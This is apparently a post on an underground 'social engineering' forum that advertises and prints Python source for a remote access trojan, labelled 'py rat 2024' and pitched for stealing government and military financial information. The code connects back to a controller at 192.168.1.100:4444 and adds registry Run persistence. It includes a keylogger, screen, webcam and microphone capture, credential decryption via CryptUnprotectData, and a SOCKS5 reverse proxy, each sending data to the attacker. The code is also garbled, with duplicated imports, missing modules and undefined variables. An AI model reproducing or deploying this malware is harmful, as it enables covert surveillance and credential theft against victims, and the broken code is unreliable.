Welcome to the Off-Shore Club

The #1 Social Engineering Project in the world since 2004 !

py rat 2024

Gold

ROOT

SENSE!
Verified Seller
Instructor
USDT(TRC-20)
$0.0
A highly efficient and powerful ransomware for stealing government and military financial information

Efficiency:
9/10 - This code uses several advanced techniques to remotely access the victim's system, including the use of network protocols, data serialization, TLS encryption, automatic port forwarding, process management, file management, and registry manipulation . All these things greatly increase the efficiency and ability of this code to penetrate the victim's system.

Being dangerous:
10/10 - This code is very dangerous. The abilities of this code to steal personal information, access security systems, manipulate sensitive files, recording keys, and even access the victim's device's webcam and microphone, all make this code a serious threat. Using such a code can have very serious legal and ethical consequences.



###############################
# #
# code by e1.coders #
# RAT 2024 #
# #
###############################

import socket
import ssl
import struct
import upnp
import psutil
import winreg
import pyautogui
import pynput
import win32api
import win32con
import win32process
import win32security
import win32file
import win32net
import win32service
import win32event
import win32gui
import win32clipboard
import win32crypt
import win32timezone
import win32profile
import win32netcon
import win32wnet
import win32api
import win32con
import win32process
import win32security
import win32file
import win32net
import win32service
import win32event
import win32gui
import win32clipboard
import win32crypt
import win32timezone
import win32profile
import win32netcon
import win32wnet
import protobuf

# TCP network stream (IPv4 & IPv6 support)
def tcp_network_stream():
# IPv4 and IPv6 support
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.1.100', 4444))

# Fast network serialization (Protocol Buffers)
def network_serialization():
# Protocol Buffers serialization
message = protobuf.Message()
message.data = b'Hello, world!'
serialized_message = message.SerializeToString()
s.send(serialized_message)

# Encrypted communication (TLS)
def encrypted_communication():
# TLS encryption
context = ssl.create_default_context(ssl.Purpose.SERVER_AUTH)
s = context.wrap_socket(s, server_hostname='example.com')
s.send(b'Encrypted message')

# UPnP Support (automatic port forwarding)
def upnp_support():
# UPnP port forwarding
upnp.add_port_mapping(4444, 4444, 'RAT')

# Task Manager
def task_manager():
# List running processes
for proc in psutil.process_iter(['pid', 'name']):
print(proc.info)

# File Manager
def file_manager():
# List files in a directory
for root, dirs, files in os.walk('C:\\'):
for file in files:
print(os.path.join(root, file))

# Startup Manager
def startup_manager():
# Modify startup registry key
key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, r'SOFTWARE\Microsoft\Windows\CurrentVersion\Run', 0, winreg.KEY_WRITE)
winreg.SetValueEx(key, 'RAT', 0, winreg.REG_SZ, 'C:\\Windows\\System32\\rat.exe')
winreg.CloseKey(key)

# Remote Desktop
def remote_desktop():
# Capture and send desktop
screen = pyautogui.screenshot()
screen.save('desktop.png')
with open('desktop.png', 'rb') as f:
s.send(f.read())

# Remote Shell
def remote_shell():
# Execute commands on the remote system
command = b'dir'
s.send(command)
result = s.recv(1024)
print(result.decode())

# Remote Execution
def remote_execution():
# Execute arbitrary code on the remote system
code = b'import os; os.system("calc.exe")'
s.send(code)

# System Information
def system_information():
# Get system information
system_info = {
'platform': sys.platform,
'architecture': struct.calcsize('P') * 8,
'processor': platform.processor(),
'ram': psutil.virtual_memory().total / (1024.0 ** 2),
'username': win32api.GetUserName(),
'hostname': socket.gethostname()
}
s.send(str(system_info).encode())

# Registry Editor
def registry_editor():
# Modify registry keys
key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, r'SOFTWARE\MyApp', 0, winreg.KEY_WRITE)
winreg.SetValueEx(key, 'Value', 0, winreg.REG_SZ, 'Hello, world!')
winreg.CloseKey(key)

# System Power Commands
def system_power_commands():
# Restart, shutdown, or suspend the system
win32api.SetSystemPowerState(True, True) # Suspend
win32api.ExitWindowsEx(win32con.EWX_REBOOT, 0) # Restart
win32api.ExitWindowsEx(win32con.EWX_SHUTDOWN, 0) # Shutdown

# Keylogger (Unicode Support)
def keylogger():
# Log keystrokes with Unicode support
def on_press(key):
try:
s.send(key.char.encode())
except AttributeError:
pass

listener = pynput.keyboard.Listener(on_press=on_press)
listener.start()

# Reverse Proxy (SOCKS5)
def reverse_proxy():
# SOCKS5 reverse proxy
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.1.100', 1080))
s.send(b'\x05\x01\x00') # SOCKS5 handshake
s.recv(2)
s.send(b'\x05\x01\x00\x03\x0Aexample.com\x00\x50') # SOCKS5 request
s.recv(10)

# Password Recovery (Common Browsers and FTP Clients)
def password_recovery():
# Recover passwords from common browsers and FTP clients
passwords = win32crypt.CryptUnprotectData(b'encrypted_password', None, None, None, 0)[1].decode()
s.send(passwords.encode())

# Provides device name and operating system details to attackers
def device_info():
# Send device name and OS details to the attacker
device_name = socket.gethostname()
os_version = platform.platform()
s.send(f'Device Name: {device_name}\nOS Version: {os_version}'.encode())

# Manipulate confidential files
def file_manipulation():
# Read, write, or delete confidential files
with open('confidential.txt', 'r') as f:
content = f.read()
s.send(content.encode())

# Hijack webcam and microphone
def hijack_devices():
# Capture video and audio from the webcam and microphone
import cv2
import pyaudio

# Webcam capture
cap = cv2.VideoCapture(0)
ret, frame = cap.read()
cv2.imwrite('webcam.jpg', frame)
with open('webcam.jpg', 'rb') as f:
s.send(f.read())

# Microphone capture
p = pyaudio.PyAudio()
stream = p.open(format=pyaudio.paInt16, channels=1, rate=44100, input=True, frames_per_buffer=1024)
audio = stream.read(1024)
s.send(audio)

# Steal login information
def steal_credentials():
# Steal login credentials from the system
import win32api
import win32con
import win32security

# Get the current user's security token
token = win32security.OpenProcessToken(win32api.GetCurrentProcess(), win32con.TOKEN_QUERY)
user_info = win32security.GetTokenInformation(token, win32security.TokenUser)
username = win32api.GetUserNameEx(win32con.NameSamCompatible)
s.send(f'Username: {username}'.encode())

# Get the user's password from the credential manager
creds = win32crypt.CryptUnprotectData(b'encrypted_password', None, None, None, 0)[1].decode()
s.send(f'Password: {creds}'.encode())
 

Create an account or login to comment

You must be a member in order to leave a comment

Create account

Create an account on our community. It's easy!

Log in

Already have an account? Log in here.

Friendly Disclaimer We do not host or store any files on our website except thread messages, most likely your DMCA content is being hosted on a third-party website and you need to contact them. Representatives of this site ("service") are not responsible for any content created by users and for accounts. The materials presented express only the opinions of their authors.
🚨 Do not get Ripped Off ! ⚖️ Deal with approved sellers or use RTM Escrow on Telegram
Gold
Mitalk.lat official Off Shore Club Chat


Gold

Panel Title #1

Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.

Panel Title #2

Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.
Top